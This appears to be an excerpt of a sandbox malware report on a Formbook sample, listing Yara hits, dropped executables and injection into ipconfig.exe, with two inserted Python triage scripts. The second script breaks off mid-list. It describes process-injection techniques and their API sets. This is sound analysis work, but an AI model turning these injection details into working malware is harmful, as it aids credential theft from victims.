Source: 3.2.jfotlqeoqb.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.jfotlqeoqb.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.jfotlqeoqb.exe.1660000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.jfotlqeoqb.exe.1660000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.jfotlqeoqb.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.jfotlqeoqb.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.jfotlqeoqb.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.jfotlqeoqb.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.jfotlqeoqb.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.jfotlqeoqb.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.287926712.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.287926712.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.292821127.0000000001660000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.292821127.0000000001660000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.545200841.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.545200841.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.545564197.0000000002680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.545564197.0000000002680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.372936782.0000000001850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.372936782.0000000001850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.290240049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.290240049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.372684561.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.372684561.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.372998768.00000000019A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.372998768.00000000019A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.337685693.000000000EC39000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.337685693.000000000EC39000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.359555357.000000000EC39000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.359555357.000000000EC39000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.545372443.0000000002600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.545372443.0000000002600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
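Added example, not part of the Joe Sandbox report: a small decoder for the memory-dump descriptors in the Yara hits above, so the matches can be grouped per process and the executable, non-image regions (where injected or unpacked code lives) separated from plain data buffers. The field layout `<pid>.<phase>.<dump id>.<base>.<protection>.<flags>.<type>.<reserved>.sdmp` is an assumption about Joe Sandbox's naming; only the protection and type fields are interpreted, using the standard Win32 `PAGE_*`/`MEM_*` values, which is consistent with the PDB-string entries in this report (the loaded `jfotlqeoqb.exe` image region carries `00000002.00000001.01000000`, i.e. read-only, image). The process-index-to-image mapping is taken from those same PDB-string entries; index 6 is not named in this excerpt.

```python
import re
from collections import defaultdict

# Dump descriptors copied from the Formbook Yara hits in this report
# (constructed list; each string is the report's own).
FORMBOOK_HITS = [
    "0000000D.00000002.545564197.0000000002680000.00000004.00000800.00020000.00000000.sdmp",
    "00000003.00000002.372936782.0000000001850000.00000040.10000000.00040000.00000000.sdmp",
    "00000003.00000000.290240049.0000000000400000.00000040.00000400.00020000.00000000.sdmp",
    "00000003.00000002.372684561.0000000000400000.00000040.00000400.00020000.00000000.sdmp",
    "00000003.00000002.372998768.00000000019A0000.00000040.10000000.00040000.00000000.sdmp",
    "00000006.00000000.337685693.000000000EC39000.00000040.00000001.00040000.00000000.sdmp",
    "00000006.00000000.359555357.000000000EC39000.00000040.00000001.00040000.00000000.sdmp",
    "0000000D.00000002.545372443.0000000002600000.00000040.10000000.00040000.00000000.sdmp",
    "00000003.00000000.287926712.0000000000400000.00000040.00000400.00020000.00000000.sdmp",
    "00000002.00000002.292821127.0000000001660000.00000004.00001000.00020000.00000000.sdmp",
    "0000000D.00000002.545200841.00000000024C0000.00000040.00000001.00040000.00000000.sdmp",
]

# Standard Win32 values (MEMORY_BASIC_INFORMATION.Protect / .Type)
PAGE_EXECUTE_READWRITE = 0x40
MEM_IMAGE, MEM_MAPPED, MEM_PRIVATE = 0x1000000, 0x40000, 0x20000
TYPE_NAMES = {MEM_IMAGE: "MEM_IMAGE", MEM_MAPPED: "MEM_MAPPED", MEM_PRIVATE: "MEM_PRIVATE"}
# Assumed meaning of the second field (when the dump was taken)
PHASES = {0: "process start", 2: "process end", 3: "during execution"}
# Process index -> image, from the PDB-string lines of this report; 6 is unnamed here
PROCESS_NAMES = {0: "skyrunyyu655432.exe", 2: "jfotlqeoqb.exe", 3: "jfotlqeoqb.exe", 13: "ipconfig.exe"}

# Assumed descriptor layout: pid.phase.dumpid.base.protect.flags.type.reserved.sdmp
SDMP_RE = re.compile(
    r"^([0-9A-F]{8})\.([0-9A-F]{8})\.(\d+)\.([0-9A-F]{16})\."
    r"([0-9A-F]{8})\.([0-9A-F]{8})\.([0-9A-F]{8})\.([0-9A-F]{8})\.sdmp$"
)


def parse_sdmp(name):
    """Split one dump descriptor into its numeric fields (flags field left uninterpreted)."""
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError(f"not a Joe Sandbox dump descriptor: {name}")
    pid, phase, _dump_id, base, prot, flags, mtype, _ = m.groups()
    return {
        "pid": int(pid, 16),
        "phase": PHASES.get(int(phase, 16), phase),
        "base": int(base, 16),
        "protect": int(prot, 16),
        "flags": int(flags, 16),
        "type": TYPE_NAMES.get(int(mtype, 16), mtype),
    }


def is_injected_code(region):
    """RWX memory that is not a mapped image is where unpacked or injected payloads live."""
    return region["protect"] == PAGE_EXECUTE_READWRITE and region["type"] != "MEM_IMAGE"


def triage(hits):
    """Group Yara hits per process and list the RWX non-image base addresses."""
    by_pid = defaultdict(list)
    for name in sorted(set(hits)):
        r = parse_sdmp(name)
        by_pid[r["pid"]].append(r)
    report = {}
    for pid, regions in sorted(by_pid.items()):
        rwx = sorted({r["base"] for r in regions if is_injected_code(r)})
        report[pid] = {
            "process": PROCESS_NAMES.get(pid, "unknown"),
            "regions": len(regions),
            "rwx_non_image": [hex(b) for b in rwx],
        }
    return report


if __name__ == "__main__":
    for pid, info in triage(FORMBOOK_HITS).items():
        print(f"pid {pid:2d} {info['process']:<22} hits={info['regions']} rwx={info['rwx_non_image']}")
```

Read with the process tree further down, the output tells the injection story without opening a single dump: process 2 (the first `jfotlqeoqb.exe`) holds Formbook only in a read-write private buffer at 0x1660000, the decrypted payload before it is written into its hollowed child; process 3 carries it at 0x400000 (the replaced image base) and in two RWX mapped regions; process 13 (`ipconfig.exe`) has it in RWX mapped regions at 0x24C0000 and 0x2600000 plus a read-write data region at 0x2680000.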
Source: C:\Users\user\Desktop\skyrunyyu655432.exe Code function: 0_2_004032FA EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
Source: C:\Users\user\Desktop\skyrunyyu655432.exe Code function: 0_2_004047EE
Source: C:\Users\user\Desktop\skyrunyyu655432.exe Code function: 0_2_00406083
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe Code function: 2_2_001F6880
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe Code function: 2_2_001F6880
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe Code function: 2_2_001F496E
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe Code function: 2_2_001F959D
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe Code function: 2_2_001F7364
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe Code function: 2_2_001F7364
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe Code function: 2_2_001F496E
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe Code function: 2_2_001F959D
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe Code function: 2_2_001E38EC
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe Code function: 2_2_001F85D1
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe Code function: 2_2_001F6DF2
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe Code function: 2_2_001F85D1
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe Code function: 2_2_001F7364
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe Code function: 2_2_001F496E
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe Code function: 3_2_001F6880
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe Code function: 3_2_001F6880
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe Code function: 3_2_001F496E
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe Code function: 3_2_001F959D
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe Code function: 3_2_001F7364
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe Code function: 3_2_001F7364
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe Code function: 3_2_001F496E
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe Code function: 3_2_001F959D
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe Code function: 3_2_001E38EC
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe Code function: 3_2_001F85D1
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe Code function: 3_2_001F6DF2
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe Code function: 3_2_001F85D1
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe Code function: 3_2_001F7364
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe Code function: 3_2_001F496E
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe Code function: 3_2_0041D805
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe Code function: 3_2_00401030
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe Code function: 3_2_0041DA33
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe Code function: 3_2_0041EB32
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe Code function: 3_2_0041C3EA
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe Code function: 3_2_0041ED64
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe Code function: 3_2_0041DD0A
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe Code function: 3_2_00402D87
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe Code function: 3_2_00402D90
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe Code function: 3_2_00409E5E
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe Code function: 3_2_00409E60
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe Code function: 3_2_00402FB0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02CA2EF7
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02CA22AE
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02BF6E30
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02C9DBD2
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02CA1FF1
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02C0EBB0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02CA2B28
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02CA28EC
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02BEB090
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02C020A0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02CA20A8
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02BE841F
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02C9D466
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02C91002
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02CA25DD
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02C02581
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02BED5E0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02BD0D20
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02BF4120
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02CA1D55
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02BDF900
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02CA2D07
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_024DDA33
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_024DEB32
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_024DC3EA
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_024DD805
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_024C9E5E
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_024C9E60
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_024C2FB0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_024DED64
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_024DDD0A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_024C2D87
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_024C2D90
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: String function: 02BDB150 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe Code function: String function: 001EEFF0 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe Code function: 3_2_0041A360 NtCreateFile,
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe Code function: 3_2_0041A410 NtReadFile,
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe Code function: 3_2_0041A490 NtClose,
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe Code function: 3_2_0041A540 NtAllocateVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe Code function: 3_2_0041A35A NtCreateFile,
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe Code function: 3_2_0041A45A NtReadFile,
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe Code function: 3_2_0041A492 NtClose,
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe Code function: 3_2_0041A53A NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02C196D0 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02C196E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02C19A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02C19FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02C19780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02C19710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02C19840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02C19860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02C195D0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02C199A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02C19540 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02C19910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02C19A80 NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02C19650 NtQueryValueKey,
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02C19660 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02C19670 NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02C19A00 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02C19610 NtEnumerateValueKey,
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02C19A10 NtQuerySection,
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02C19A20 NtResumeThread,
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02C197A0 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02C1A3B0 NtGetContextThread,
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02C19760 NtOpenProcess,
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02C19770 NtSetInformationFile,
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02C1A770 NtOpenThread,
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02C19B00 NtSetValueKey,
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02C1A710 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02C19730 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02C198F0 NtReadVirtualMemory,
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02C198A0 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02C1B040 NtSuspendThread,
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02C19820 NtEnumerateKey,
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02C199D0 NtCreateProcessEx,
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02C195F0 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02C19950 NtQueueApcThread,
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02C19560 NtWriteFile,
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02C19520 NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_02C1AD30 NtSetContextThread,
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_024DA360 NtCreateFile,
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_024DA410 NtReadFile,
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_024DA490 NtClose,
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_024DA35A NtCreateFile,
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_024DA45A NtReadFile,
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 13_2_024DA492 NtClose,
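Added example, not part of the Joe Sandbox report: the `Nt*` entries for process 13 above are worth more than a flat list, because together they form the complete API set of three injection techniques, and their addresses (0x02C19xxx) fall between the two `ipconfig.exe` dumps that carry the `wntdll.pdb` string (0x02BB0000 and 0x02CCF000), which is consistent with Formbook calling a private copy of ntdll rather than the hooked one (an inference from the addresses, not something the report states). The script below parses the report's `Code function` entries (the strings are copied from the page, the list is constructed here) and checks them against technique-to-API groupings that are this example's own approximation of hollowing, APC injection, thread hijacking and classic remote-thread injection; `NtCreateThreadEx` is a real ntdll export that does not appear in this report and is included to show an incomplete match.

```python
import re

# "Code function" entries for process 13 (ipconfig.exe), copied from this report.
REPORT_LINES = [
    "13_2_02C196D0 NtCreateKey,LdrInitializeThunk,",
    "13_2_02C19A50 NtCreateFile,LdrInitializeThunk,",
    "13_2_02C19780 NtMapViewOfSection,LdrInitializeThunk,",
    "13_2_02C19860 NtQuerySystemInformation,LdrInitializeThunk,",
    "13_2_02C199A0 NtCreateSection,LdrInitializeThunk,",
    "13_2_02C19660 NtAllocateVirtualMemory,",
    "13_2_02C19A00 NtProtectVirtualMemory,",
    "13_2_02C19A20 NtResumeThread,",
    "13_2_02C197A0 NtUnmapViewOfSection,",
    "13_2_02C1A3B0 NtGetContextThread,",
    "13_2_02C19760 NtOpenProcess,",
    "13_2_02C1A770 NtOpenThread,",
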